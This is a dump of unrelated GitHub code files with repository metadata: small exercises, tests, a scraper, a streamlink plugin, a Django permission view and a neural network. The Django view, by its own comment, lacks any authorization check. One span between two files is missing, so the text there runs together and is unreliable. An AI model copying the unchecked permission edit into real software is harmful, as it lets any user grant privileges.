track\r\n\r\n\tdef get_recommendations(self, track, genre, limit):\r\n\t\trecommendations = self.spotify.recommendations(seed_tracks = [track['id']], seed_artists = [track['artists'][0]['id']], seed_genres = genre, limit = limit)\r\n\t\ttracks_of_recommend = recommendations['tracks']\r\n\t\treturn tracks_of_recommend\r\n\r\n\tdef get_genres(self):\r\n\t\tgenres = self.spotify.recommendation_genre_seeds()\r\n\t\treturn genres\r\n","repo_name":"stant1er/Bothoven","sub_path":"spotify.py","file_name":"spotify.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11559554666","text":"def sum_digits(num: int) -> int:\n nums = 0\n while num != 0:\n digit = num % 10\n nums += digit\n num = num // 10\n\n return nums\n\n\nwith open(\"trojki.txt\") as file:\n for line in file:\n a, b, c = map(int, line.strip().split())\n\n if sum_digits(a) + sum_digits(b) == c:\n print(a, b, c)\n","repo_name":"bartekpacia/matura","sub_path":"zbior/66/zad661.py","file_name":"zad661.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"30444982114","text":"import logging\nimport json\nimport time\n\nfrom bs4 import BeautifulSoup\nfrom json.decoder import JSONDecodeError\n\nfrom .. import constants\nfrom .. import actions\n\nlogger = logging.getLogger(__name__)\n\n\nclass GetUserId(actions.Action):\n def __init__(self, scraper, username):\n super().__init__(scraper)\n self.__username = username\n\n def do(self):\n \"\"\" Get the id of a username \"\"\"\n\n # Open new tab and load the link\n link = constants.INSTAGRAM_USER_INFO_URL_DEFAULT.format(self.__username)\n self._web_driver.execute_script(\"window.open('\" + link + \"','_blank');\")\n first_tab_handle = self._web_driver.current_window_handle\n\n # Switch to the new tab\n self._web_driver.switch_to.window(self._web_driver.window_handles[1])\n time.sleep(2)\n\n # Get data\n result = self._scraper.web_driver.page_source\n soup = BeautifulSoup(result, 'html.parser')\n\n # Close the new tab\n self._web_driver.close()\n self._web_driver.switch_to.window(first_tab_handle)\n time.sleep(2)\n\n try:\n data = json.loads(soup.text)\n return data['graphql']['user']['id']\n except (JSONDecodeError, KeyError) as err:\n logger.error('could not retrieve user id: %s' % str(err))\n\n def on_fail(self):\n pass\n","repo_name":"zaironjacobs/instagram-scraper","sub_path":"instagram_scraper/actions/get_user_id.py","file_name":"get_user_id.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"32008321434","text":"class BankAccount:\n\n def __init__(self, int_rate,balance):\n self.int_rate = int_rate\n self.balance = balance\n\n def with_draw(self,amount):\n # we can use the static method here to evaluate\n # if we can withdraw the funds without going negative\n if BankAccount.can_withdraw(self.balance,amount):\n self.balance -= amount\n else:\n print(\"Insufficient Funds\")\n return self\n \n # static methods have no access to any attribute,\n # only to what is passed into them\n # use if you need a method that doesn't use self, or cls\n @staticmethod\n def can_withdraw(balance,amount):\n if (balance - amount) < 0:\n return False\n else:\n return True\n \ngarett = BankAccount(0.05, 
2000)\nprint(garett.balance)\ngarett.with_draw(100)\nprint(garett.balance)\n","repo_name":"woox99/Python","sub_path":"00_Reference_Library/150_Classes/153_Static_Method/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3111330079","text":"import bisect\n\n\n\ndef test_bisect():\n xs = [1, 2, 3, 4, 5, 6, 6, 7]\n n = 4\n assert bisect.bisect_left(xs, n) == 3\n assert bisect.bisect_left(xs, n, 0) == 3\n assert bisect.bisect_left(xs, n, 0, len(xs)) == 3\n assert bisect.bisect_right(xs, n) == 4\n assert bisect.bisect(xs, n) == 4\n\n bisect.insort_left(xs, n)\n assert xs == [1, 2, 3, 4, 4, 5, 6, 6, 7]\n\n bisect.insort_right(xs, n)\n assert xs == [1, 2, 3, 4, 4, 4, 5, 6, 6, 7]\n\n bisect.insort(xs, n)\n assert xs == [1, 2, 3, 4, 4, 4, 4, 5, 6, 6, 7]\n\n\n\nclass Pair:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n @property\n def val(self):\n return (self.x, self.y)\n\n def __repr__(self):\n return \"Pair(%s, %s)\" % (self.x, self.y)\n\n def __lt__(self, other):\n return self.x + self.y < other.x + other.y\n\n def __eq__(self, other):\n return self.x + self.y == other.x + other.y\n\n\n\ndef test_bisect_insort():\n pairs = [[18, 6], [28, 5], [35, 26], [31, 28], [3, 3], [32, 37], [11, 17], [28, 29]]\n items = []\n for pair in pairs:\n bisect.insort(items, Pair(pair[0], pair[1]))\n\n assert items[0].val == (3,3)\n assert items[-1].val == (32, 37)\n assert [i.val for i in items] == [(3, 3), (18, 6), (11, 17), (28, 5), (28, 29), (31, 28), (35, 26), (32, 37)]\n \n\n\ndef test_all():\n test_bisect()\n test_bisect_insort()\n \n\nif __name__ == '__main__':\n test_all() ","repo_name":"shedskin/shedskin","sub_path":"tests/test_mod_bisect/test_mod_bisect.py","file_name":"test_mod_bisect.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":721,"dataset":"github-code","pt":"31"} +{"seq_id":"3109777949","text":"\"\"\"\r\nPorted from Sean McCullough's Processing code:\r\nhttp://www.cricketschirping.com/processing/CirclePacking1/\r\n\r\nSee also: http://en.wiki.mcneel.com/default.aspx/McNeel/2DCirclePacking\r\nhttp://www.cricketschirping.com/weblog/?p=1047\r\nSee also:\r\nhttp://www.infovis-wiki.net/index.php/Circle_Packing\r\n\r\nOriginal NodeBox code by Tom De Smedt:\r\nhttp://nodebox.net/code/index.php/shared_2008-08-07-12-55-33\r\nLater ported to Python + Psyco + Pygame by leonardo maffi, V.1.0, Apr 14 2009\r\n\"\"\"\r\n\r\nimport sys, os, time\r\nfrom random import randrange\r\n\r\nimport pygame # if pygame is absent this program may just print coords\r\nfrom pygame.locals import QUIT, K_ESCAPE, MOUSEBUTTONDOWN, MOUSEBUTTONUP, MOUSEMOTION\r\n\r\nimport circle\r\n\r\n# to center the window in the screen\r\nif sys.platform == 'win32' or sys.platform == 'win64':\r\n os.environ['SDL_VIDEO_CENTERED'] = '1'\r\n\r\nSCREEN_WIDTH = 900\r\nSCREEN_HEIGHT = 850\r\n\r\n# you can reduce the NCIRCLES if you don't have Psyco or you have a slow PC\r\nNCIRCLES = 120\r\n\r\n# more iterations = smoother physics but slower animation\r\nITERATIONS = 80\r\n\r\nSCREEN_WIDTH_2 = SCREEN_WIDTH / 2\r\nSCREEN_HEIGHT_2 = SCREEN_HEIGHT / 2\r\n\r\ndef clamp(col):\r\n col = int(col)\r\n if col <= 0:\r\n return 0\r\n elif col > 255:\r\n return 255\r\n else:\r\n return col\r\n\r\ndef setup():\r\n global circles, surface, drawsurf, dragged, screen\r\n\r\n pygame.init()\r\n icon = pygame.Surface((1, 1))\r\n icon.set_alpha(0)\r\n 
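# Descriptive note on the surrounding two lines (added for clarity): a fully
# transparent 1x1 Surface is installed as the window icon, which effectively
# hides pygame's default icon; on some platforms pygame.display.set_icon only
# takes effect reliably when called before pygame.display.set_mode, as is
# done here.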
pygame.display.set_icon(icon)\r\n screen = (SCREEN_WIDTH, SCREEN_HEIGHT)\r\n\r\n pygame.display.set_caption(\"Circle packing 2\")\r\n surface = pygame.display.set_mode(screen)\r\n\r\n drawsurf = pygame.Surface(screen).convert()\r\n drawsurf.set_colorkey((0, 0, 0))\r\n\r\n circles = []\r\n for i in range(NCIRCLES):\r\n radius = randrange(5, 6 + int(i/1.8))\r\n\r\n r = clamp(radius * 0.02 * 256)\r\n g = clamp((0.2 + radius * 0.03) * 256)\r\n b = 0\r\n a = clamp(0.8 * 256)\r\n c = circle.Circle(randrange(SCREEN_WIDTH), randrange(SCREEN_HEIGHT), radius, (r, g, b, a))\r\n\r\n circles.append(c)\r\n\r\n dragged = None\r\n\r\ndef get_input():\r\n global dragged\r\n key = pygame.key.get_pressed()\r\n\r\n for event in pygame.event.get():\r\n if event.type == QUIT or key[K_ESCAPE]:\r\n pygame.quit()\r\n sys.exit()\r\n elif event.type == MOUSEBUTTONDOWN and dragged is None:\r\n mousex, mousey = pygame.mouse.get_pos()\r\n for circle in circles:\r\n if circle.contains(mousex, mousey):\r\n dragged = circle\r\n elif event.type == MOUSEMOTION and dragged is not None:\r\n # drag objects with the mouse\r\n dragged.x, dragged.y = pygame.mouse.get_pos()\r\n elif event.type == MOUSEBUTTONUP:\r\n dragged = None\r\n\r\ndef run():\r\n global dragged\r\n\r\n iterations = 0\r\n t0 = time.time()\r\n while True:\r\n iterations += 1\r\n if iterations % 10 == 0:\r\n print(time.time()-t0)\r\n t0 = time.time()\r\n get_input()\r\n\r\n surface.fill((0, 0, 0))\r\n drawsurf.fill((0, 0, 0))\r\n\r\n for c in circles:\r\n pygame.draw.circle(drawsurf, pygame.Color(*c.color), (int(c.x), int(c.y)), int(c.radius), 0)\r\n\r\n for i in range(1, ITERATIONS):\r\n circle.pack(circles, 0.1/i, 2, dragged)\r\n\r\n surface.blit(drawsurf, (0, 0))\r\n pygame.display.flip()\r\n\r\nsetup()\r\ncircle.setup(SCREEN_WIDTH, SCREEN_HEIGHT)\r\nrun()\r\n","repo_name":"shedskin/shedskin","sub_path":"examples/circle/circle_main.py","file_name":"circle_main.py","file_ext":"py","file_size_in_byte":3474,"program_lang":"python","lang":"en","doc_type":"code","stars":721,"dataset":"github-code","pt":"31"} +{"seq_id":"14496625959","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport DFEC\n\nsample1 = np.load('sample1.npz')\nsample2 = np.load('sample2.npz')\nsample3 = np.load('sample3.npz')\nsample4 = np.load('sample4.npz')\nsample5 = np.load('sample5.npz')\nsample6 = np.load('sample6.npz')\nsample7 = np.load('sample7.npz')\nsample8 = np.load('sample8.npz')\nsample9 = np.load('sample9.npz')\nsample10 = np.load('sample10.npz')\nsample11 = np.load('sample11.npz')\n\nx1 = sample1['arr_0']\nx2 = sample2['arr_0']\nx3 = sample3['arr_0']\nx4 = sample4['arr_0']\nx5 = sample5['arr_0']\nx6 = sample6['arr_0']\nx7 = sample7['arr_0']\nx8 = sample8['arr_0']\nx9 = sample9['arr_0']\nx10 = sample10['arr_0']\nx11 = sample11['arr_0']\n\ntime1 = [x1,x3,x7,x9]\ntime2 = [x5,x10]\nx_axis = np.arange(256) * .05\n\ndef timeplot1():\n\tn = 1\n\tfor item in time1:\n\t\tif n < 3:\n\t\t\tm = 4*n - 2\n\t\telse:\n\t\t\tm = 4*n + 2\n\t\tplt.subplot(2,2,n)\n\t\tplt.plot(x_axis,item)\n\t\tplt.title(r'$\\nu_{sig} =$'+str(m)+'MHz',fontsize=14)\n\t\tplt.xlabel(r'Time ($\\mu{s}$)')\n\t\tplt.ylabel('Voltage (V)')\n\t\tplt.xlim(0,12.8)\n\t\tn = n+1\n\nplt.figure(1)\ntimeplot1()\nplt.tight_layout()\nplt.show()\n \ndef timeplot2():\n\tn = 1\n\tfor item in time2:\n\t\tm = 10*n\n\t\tplt.subplot(2,1,n)\n\t\tplt.plot(x_axis,item)\n\t\tplt.title(r'$\\nu_{sig} =$'+str(m)+'MHz',fontsize=14)\n\t\tplt.xlabel(r'Time ($\\mu{s}$)')\n\t\tplt.ylabel('Voltage (V)')\n\t\tplt.xlim(0,12.8)\n\t\tn = 
n+1\n\t\nplt.figure(2)\ntimeplot2()\nplt.tight_layout()\nplt.show()\n\ndef timeplot3():\n\tplt.plot(x_axis,x11)\n\tplt.title(r'$\nu_{sig} = 30 MHz, \nu_{samp} = 100 kHz$',fontsize=14)\n\tplt.xlabel(r'Time ($\mu{s}$)')\n\tplt.ylabel('Voltage (V)')\n\nplt.figure(3)\ntimeplot3()\nplt.tight_layout()\nplt.show()\n\t\n","repo_name":"rgao/berkeley","sub_path":"ugastro/digital/timesample.py","file_name":"timesample.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"73229005209","text":"# Write a program in which: given a list of three distinct numeric values,\n# compute and report their range of variation (it must show the largest and the smallest of them)\n\nnumero1=int(input(\"Ingrese el primer número: \"))\nnumero2=int(input(\"Ingrese el segundo número: \"))\nnumero3=int(input(\"Ingrese el tercer número: \"))\n\nif numero1>numero2 and numero2>numero3:\n mayor=numero1\nelif numero2>numero1 and numero2>numero3:\n mayor=numero2\nelse:\n mayor=numero3\n\nif numero1 target:\n end -= 1\n elif sum < target:\n start += 1\n else:\n return [start+1, end+1]\n \n return []\n","repo_name":"rahulkumar1m/LeetCode-python","sub_path":"Easy-tagged/Two-Sum-II-Input-array-sorted.py","file_name":"Two-Sum-II-Input-array-sorted.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42299704514","text":"#list of numbers\nlist1=[]\nwhile True:\n x = input('Enter the element to list')\n if x == \"No\":\n break\n list1.append(x)\nlist2 =[list1[0],list1[-1]]\nprint(list1)\nprint(list2)","repo_name":"sudheesha93/Python_InClassExercise","sub_path":"ICE2/Source/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5704613651","text":"import unittest\r\n\r\nfrom core.data_handlers.RatingsTable import RatingsTable\r\nfrom core.data_handlers.SongTable import SongTable\r\nfrom core.data_handlers.UserTable import UserTable\r\nfrom parameterized import parameterized\r\nfrom exceptions.ColumnValueException import ColumnValueNotExistException\r\n\r\n\r\nclass RatingsTableTest(unittest.TestCase):\r\n\r\n def tearDown(self):\r\n self.ratings.drop()\r\n self.users.drop()\r\n self.songs.drop()\r\n\r\n def setUp(self):\r\n self.users = UserTable()\r\n self.users.add('Pietro', 'Ciccio1', 'pietro.m.96@gmail.com', 'Italy')\r\n self.users.add('Pierre', 'Ciccio2', 'pierre.m.96@gmail.com', 'France')\r\n self.songs = SongTable('../sources/processed_data/spotify_music/SpotifyFeatures.csv')\r\n self.ratings = RatingsTable()\r\n\r\n @parameterized.expand([\r\n ('RatingsTableTest_Test_07', 'U-0000', '0BjC1NfoEOOusryehmNudP', 1, 1),\r\n ('RatingsTableTest_Test_08', 'U-0000', '0CoSDzoNIKCRs124s9uTVy', 2, 2)\r\n ])\r\n def test_add_rating(self, _, test_user_id, test_song_id, test_rating, expected):\r\n self.assertEqual(expected, self.ratings.add(test_user_id, test_song_id, test_rating))\r\n\r\n @parameterized.expand([\r\n ('RatingsTableTest_Test_09', 'U-0001', '0BjC1NfoEOOusryehmNu11', 1, ColumnValueNotExistException)\r\n ])\r\n @unittest.skip('Exception no longer raised')\r\n def test_add_rating2(self, _, test_user_id, test_song_id, test_rating, test_exception):\r\n self.assertRaises(test_exception, self.ratings.add, test_user_id, test_song_id, test_rating)\r\n\r\n 
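    # Illustrative note on the parameterized cases in this suite (assuming the
    # standard behavior of parameterized.expand, not part of the original
    # tests): each tuple expands into its own generated test method, e.g. the
    # first case above runs as test_add_rating_0_RatingsTableTest_Test_07; the
    # leading string is used to build the generated name and is also passed in
    # as the `_` argument.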
@parameterized.expand([\r\n ('RatingsTableTest_Test_10', 'U-0000', '0BjC1NfoEOOusryehmNudP', 2, 2),\r\n ('RatingsTableTest_Test_11', 'U-0000', '0CoSDzoNIKCRs124s9uTVy', 3, 3)\r\n ])\r\n def test_update_rating(self, _, test_user_id, test_song_id, test_rating, expected):\r\n self.ratings.add(test_user_id, test_song_id, 1)\r\n self.ratings.update(test_user_id, test_song_id, test_rating)\r\n actual = self.ratings.search((('ratings',), [('user_id', '=', test_user_id), 'AND',\r\n ('song_id', '=', test_song_id)]))\r\n self.assertEqual(expected, actual)\r\n\r\n @parameterized.expand([\r\n ('RatingsTableTest_Test_12', 'U-0001', '0BRjO6ga9RKCKjfDqeFg11', 1, ColumnValueNotExistException)\r\n ])\r\n @unittest.skip('Exception no longer raised')\r\n def test_update_rating2(self, _, test_user_id, test_song_id, test_rating, test_exception):\r\n self.ratings.add(test_user_id, test_song_id, 1)\r\n self.assertRaises(test_exception, self.ratings.update, test_user_id, test_song_id, test_rating)\r\n\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n","repo_name":"wilsonjefferson/DSSC_IR","sub_path":"tests/RatingsTableTest.py","file_name":"RatingsTableTest.py","file_ext":"py","file_size_in_byte":2721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12257464579","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, redirect\nfrom project.forms import StaffPermissionForm\nfrom django.contrib.auth.models import User, Permission\n\n\n# staff permission editing\n@login_required\ndef edit_permissions(request, pk=None):\n # When a user is granted a permission for one dealer or distributor, they end up with the same permission in all the others.\n # To fix this, a new table should be created and the permission stored there together with its object id.\n # We will not build an example of this in this course. You can try it yourself as an exercise if you like.\n # If you want to attempt it, we will build similar structures in later lessons and your knowledge will grow.\n # I recommend trying it once the course is finished.\n\n # There is no permission check here; anyone can change any user's settings.\n role_page = request.session.get('role_page', False)\n instance = User.objects.get(pk=pk)\n\n if request.method == 'POST':\n form = StaffPermissionForm(request.POST)\n\n if form.is_valid():\n # Product Permission\n product_permission = form.cleaned_data['product_permission']\n product_db_permission = Permission.objects.get(codename='manage_product')\n if product_permission:\n instance.user_permissions.add(product_db_permission)\n else:\n instance.user_permissions.remove(product_db_permission)\n\n # Order Permission\n order_permission = form.cleaned_data['order_permission']\n order_db_permission = Permission.objects.get(codename='manage_order')\n if order_permission:\n instance.user_permissions.add(order_db_permission)\n else:\n instance.user_permissions.remove(order_db_permission)\n\n # Payment Permission\n payment_permission = form.cleaned_data['payment_permission']\n payment_db_permission = Permission.objects.get(codename='manage_payment')\n if payment_permission:\n instance.user_permissions.add(payment_db_permission)\n else:\n instance.user_permissions.remove(payment_db_permission)\n\n if role_page == 'distributor':\n # Dealer Permission\n dealer_permission = form.cleaned_data['dealer_permission']\n dealer_db_permission = Permission.objects.get(codename='manage_dealer')\n if dealer_permission:\n instance.user_permissions.add(dealer_db_permission)\n else:\n instance.user_permissions.remove(dealer_db_permission)\n\n return redirect('list-staff')\n else:\n\n product_permission = instance.has_perm('project.manage_product')\n order_permission = instance.has_perm('project.manage_order')\n payment_permission = instance.has_perm('project.manage_payment')\n dealer_permission = instance.has_perm('project.manage_dealer')\n\n form = StaffPermissionForm(initial={'product_permission': product_permission,\n 'dealer_permission': dealer_permission,\n 'order_permission': order_permission,\n 'payment_permission': payment_permission})\n\n if role_page == 'dealer':\n del form.fields['dealer_permission']\n\n return render(request, 'project/accounts/edit_permissions.html', {'form': form})\n","repo_name":"educatecomtr/stocks","sub_path":"project/views/accounts/edit_staff_permissions.py","file_name":"edit_staff_permissions.py","file_ext":"py","file_size_in_byte":3562,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70484427927","text":"if __name__ == \"__main__\":\n import os\n import glob\n\n datapath = []\n if \"textbook\" in glob.glob(\"*\"):\n datapath.append(\"textbook\")\n datapath.append(\"data\")\n elif len(glob.glob(\"*.py\")) > 0:\n datapath.extend([\"..\", \"..\", \"data\"])\n datapath = os.path.join(*datapath)\n\n path = os.path.join(datapath, \"rosalind_ba3e.txt\")\n if os.path.exists(path):\n with open(path) as f:\n patterns = f.readlines()\n patterns = [p.strip() for p in patterns]\n\n\ndef debruijn_from_kmers(patterns):\n # given a collection of k-mers, the nodes are simply all unique (k-1)-mers that are a prefix or suffix of any k-mer\n k = len(patterns[0]) - 1\n nodes = set()\n for p in patterns:\n nodes.add(p[1:])\n nodes.add(p[:k])\n\n # for every k-mer, we connect the prefix node and suffix node by a directed edge\n edges = {node: 
[] for node in nodes}\n for p in patterns:\n edges[p[:k]].append(p[1:])\n\n # create print format of adjacency list\n adjacency_list = []\n for node in edges:\n if len(edges[node]) > 0:\n adjacency_list.append(node + \" -> \" + \",\".join(edges[node]))\n\n return adjacency_list\n\n\n# print(debruijn_from_kmers(['GAGG','CAGG','GGGG','GGGA','CAGG','AGGG','GGAG']))\n\n# write to output file\nwith open(os.path.join(datapath, \"rosalind_ba3e_output.txt\"), \"w\") as outputfile:\n outputfile.write(\"\\n\".join(debruijn_from_kmers(patterns)))\n","repo_name":"Bennibraun/Rosalind-Projects","sub_path":"textbook/scripts/3/BA3E.py","file_name":"BA3E.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8421594517","text":"# date: 27/jun/20\n# 1491. Average Salary Excluding the Minimum and Maximum Salary\n# Easy\n\n# 22\n\n# 2\n\n# Add to List\n\n# Share\n# Given an array of unique integers salary where salary[i] is the salary of the employee i.\n\n# Return the average salary of employees excluding the minimum and maximum salary.\n\n \n\n# Example 1:\n\n# Input: salary = [4000,3000,1000,2000]\n# Output: 2500.00000\n# Explanation: Minimum salary and maximum salary are 1000 and 4000 respectively.\n# Average salary excluding minimum and maximum salary is (2000+3000)/2= 2500\n# Example 2:\n\n# Input: salary = [1000,2000,3000]\n# Output: 2000.00000\n# Explanation: Minimum salary and maximum salary are 1000 and 3000 respectively.\n# Average salary excluding minimum and maximum salary is (2000)/1= 2000\n# Example 3:\n\n# Input: salary = [6000,5000,4000,3000,2000,1000]\n# Output: 3500.00000\n# Example 4:\n\n# Input: salary = [8000,9000,2000,3000,6000,1000]\n# Output: 4750.00000\n\nclass Solution(object):\n def average(self, salary):\n \"\"\"\n :type salary: List[int]\n :rtype: float\n \"\"\"\n minm = min(salary)\n maxm = max(salary)\n \n salary.remove(minm)\n salary.remove(maxm)\n \n return sum(salary)/float(len(salary))\n ","repo_name":"viveksumanth/Code-Everyday","sub_path":"june 20/1491.py","file_name":"1491.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25010654874","text":"import logging\nimport re\n\nfrom streamlink.plugin import Plugin\nfrom streamlink.plugin.api import useragents, validate\nfrom streamlink.stream import HLSStream, HTTPStream, RTMPStream\n\nlog = logging.getLogger(__name__)\n\n\nclass App17(Plugin):\n _url_re = re.compile(r\"https://17.live/live/(?P[^/&?]+)\")\n API_URL = \"https://api-dsa.17app.co/api/v1/lives/{0}/viewers/alive\"\n\n _api_schema = validate.Schema(\n {\n \"rtmpUrls\": [{\n validate.optional(\"provider\"): validate.any(int, None),\n \"url\": validate.url(),\n }],\n },\n validate.get(\"rtmpUrls\"),\n )\n\n @classmethod\n def can_handle_url(cls, url):\n return cls._url_re.match(url) is not None\n\n def _get_streams(self):\n match = self._url_re.match(self.url)\n channel = match.group(\"channel\")\n\n self.session.http.headers.update({'User-Agent': useragents.CHROME, 'Referer': self.url})\n\n data = '{\"liveStreamID\":\"%s\"}' % (channel)\n\n try:\n res = self.session.http.post(self.API_URL.format(channel), data=data)\n res_json = self.session.http.json(res, schema=self._api_schema)\n log.trace(\"{0!r}\".format(res_json))\n http_url = res_json[0][\"url\"]\n except Exception as e:\n log.info(\"Stream currently unavailable.\")\n log.debug(str(e))\n return\n\n https_url 
= http_url.replace(\"http:\", \"https:\")\n yield \"live\", HTTPStream(self.session, https_url)\n\n if 'pull-rtmp' in http_url:\n rtmp_url = http_url.replace(\"http:\", \"rtmp:\").replace(\".flv\", \"\")\n stream = RTMPStream(self.session, {\n \"rtmp\": rtmp_url,\n \"live\": True,\n \"pageUrl\": self.url,\n })\n yield \"live\", stream\n\n if 'wansu-' in http_url:\n hls_url = http_url.replace(\".flv\", \"/playlist.m3u8\")\n else:\n hls_url = http_url.replace(\"live-hdl\", \"live-hls\").replace(\".flv\", \".m3u8\")\n\n s = HLSStream.parse_variant_playlist(self.session, hls_url)\n if not s:\n yield \"live\", HLSStream(self.session, hls_url)\n else:\n if len(s) == 1:\n for _n, _s in s.items():\n yield \"live\", _s\n else:\n yield from s.items()\n\n\n__plugin__ = App17\n","repo_name":"Tup0lev/BiliBili_Global_Streaming_Projet_Katyusha","sub_path":"packages/streamlink/plugins/app17.py","file_name":"app17.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"31"} +{"seq_id":"40209980793","text":"import torch\r\nimport torch.nn as nn\r\nfrom common import *\r\nfrom readH5 import *\r\nfrom utils import * \r\nimport torch.nn.functional as F\r\n\r\nclass Net(nn.Module):\r\n\tdef __init__(self, angRes, channels, factor):\r\n\t\tsuper(Net, self).__init__()\r\n\t\t\r\n\t\tn_blocks = 15\r\n\t\tself.angRes = angRes\r\n\t\tself.upscale_factor = factor\r\n\t \r\n\t\tself.HFEM_1 = HFEM(angRes, n_blocks, channels,first=True)\r\n\t\tself.HFEM_2 = HFEM(angRes, n_blocks, channels,first=False)\r\n\t\tself.HFEM_3 = HFEM(angRes, n_blocks, channels,first=False)\r\n\t\tself.HFEM_4 = HFEM(angRes, n_blocks, channels,first=False)\r\n\t\tself.HFEM_5 = HFEM(angRes, n_blocks, channels,first=False)\r\n\r\n\t\t# define tail module for upsamling\r\n\t\tUpSample = [\r\n\t\t\tUpsampler(self.upscale_factor, channels,kernel_size=3, stride =1,dilation=1, padding=1, act=False),\r\n\t\t\tnn.Conv2d(channels, 1, kernel_size=1,stride =1,dilation=1,padding=0,bias=False)]\r\n\t\r\n\t\tself.UpSample = nn.Sequential(*UpSample)\r\n\t\t\r\n\r\n\tdef forward(self, x):\r\n\t\t\r\n\t\t#Reshaping and Upscaling\r\n\t\tx_reshaping = MacPI2SAI(x,self.angRes)\r\n\t\tx_upscale = F.interpolate(x_reshaping, scale_factor=self.upscale_factor, mode='bicubic', align_corners=False)\r\n\r\n\t\tHFEM_1 = self.HFEM_1(x)\r\n\t\tHFEM_2 = self.HFEM_2(HFEM_1)\r\n\t\tHFEM_3 = self.HFEM_3(HFEM_2)\r\n\t\tHFEM_4 = self.HFEM_4(HFEM_3)\r\n\t\tHFEM_5 = self.HFEM_5(HFEM_4)\r\n\r\n\t\t#Reshaping\r\n\t\tx_out = MacPI2SAI(HFEM_5,self.angRes)\r\n\t\tx_out= self.UpSample(x_out)\r\n\r\n\t\tx_out += x_upscale\r\n\r\n\t\treturn x_out\r\n\r\n\r\nclass HFEM(nn.Module):\r\n\tdef __init__(self, angRes, n_blocks, channels,first=False):\r\n\t\tsuper(HFEM, self).__init__()\r\n\t\t\r\n\t\tself.first = first \r\n\t\tself.n_blocks = n_blocks\r\n\t\tself.angRes = angRes\r\n\r\n\t\t# define head module epi feature\r\n\t\thead_epi = []\r\n\t\tif first: \r\n\t\t\thead_epi.append(nn.Conv2d(angRes, channels, kernel_size=3, stride=1, padding=1, bias=False))\r\n\t\telse:\r\n\t\t\thead_epi.append(nn.Conv2d(angRes*channels, channels, kernel_size=3, stride=1, padding=1, bias=False))\r\n\r\n\t\tself.head_epi = nn.Sequential(*head_epi)\r\n\r\n\t\tself.epi2spa = nn.Sequential(\r\n\t\t\tnn.Conv2d(4*channels, int(angRes * angRes * channels), kernel_size=1, stride=1, padding=0, bias=False),\r\n\t\t\tnn.PixelShuffle(angRes),\r\n\t\t)\r\n\r\n\r\n\t\t# define head module intra spatial feature\r\n\t\thead_spa_intra = 
[]\r\n\t\tif first: \r\n\t\t\thead_spa_intra.append(nn.Conv2d(1 ,channels, kernel_size=3, stride=1,dilation=int(angRes), padding=int(angRes), bias=False))\r\n\t\t\t\r\n\t\telse:\r\n\t\t\thead_spa_intra.append(nn.Conv2d(channels ,channels, kernel_size=3, stride=1,dilation=int(angRes), padding=int(angRes), bias=False))\r\n\t\t\t\r\n\r\n\t\tself.head_spa_intra = nn.Sequential(*head_spa_intra)\r\n\r\n\r\n\t\t# define head module inter spatial feature\r\n\t\thead_spa_inter = []\r\n\t\tif first: \r\n\t\t\thead_spa_inter.append(nn.Conv2d(1 ,channels, kernel_size=3, stride=1,dilation=1, padding=1, bias=False))\r\n\t\telse:\r\n\t\t\thead_spa_inter.append(nn.Conv2d(channels ,channels, kernel_size=3, stride=1,dilation=1, padding=1, bias=False))\r\n\t\t\t\r\n\r\n\t\tself.head_spa_inter = nn.Sequential(*head_spa_inter)\r\n\r\n\t\t\r\n\r\n\t\t# define head module intra angular feature\r\n\t\thead_ang_intra = []\r\n\t\tif first: \r\n\t\t\thead_ang_intra.append(nn.Conv2d(1 ,channels, kernel_size=int(angRes), stride = int(angRes), dilation=1, padding=0, bias=False))\r\n\r\n\t\telse:\r\n\t\t\thead_ang_intra.append(nn.Conv2d(channels ,channels, kernel_size=int(angRes), stride = int(angRes), dilation=1, padding=0, bias=False))\r\n\t\t\t\r\n\r\n\t\tself.head_ang_intra = nn.Sequential(*head_ang_intra)\r\n\r\n\t\tself.ang2spa_intra = nn.Sequential(\r\n\t\t\tnn.Conv2d(channels, int(angRes * angRes * channels), kernel_size=1, stride=1, padding=0, bias=False),\r\n\t\t\tnn.PixelShuffle(angRes), \r\n\t\t)\r\n\r\n\r\n\t\t# define head module inter angular feature\r\n\t\thead_ang_inter = []\r\n\t\tif first: \r\n\t\t\thead_ang_inter.append(nn.Conv2d(1 ,channels, kernel_size=int(angRes*2), stride = int(angRes*2), dilation=1, padding=0, bias=False))\r\n\r\n\t\telse:\r\n\t\t\thead_ang_inter.append(nn.Conv2d(channels ,channels, kernel_size=int(angRes*2), stride = int(angRes*2), dilation=1, padding=0, bias=False))\r\n\t\t\t\r\n\r\n\t\tself.head_ang_inter = nn.Sequential(*head_ang_inter)\r\n\r\n\t\t\t\r\n\t\tself.ang2spa_inter = 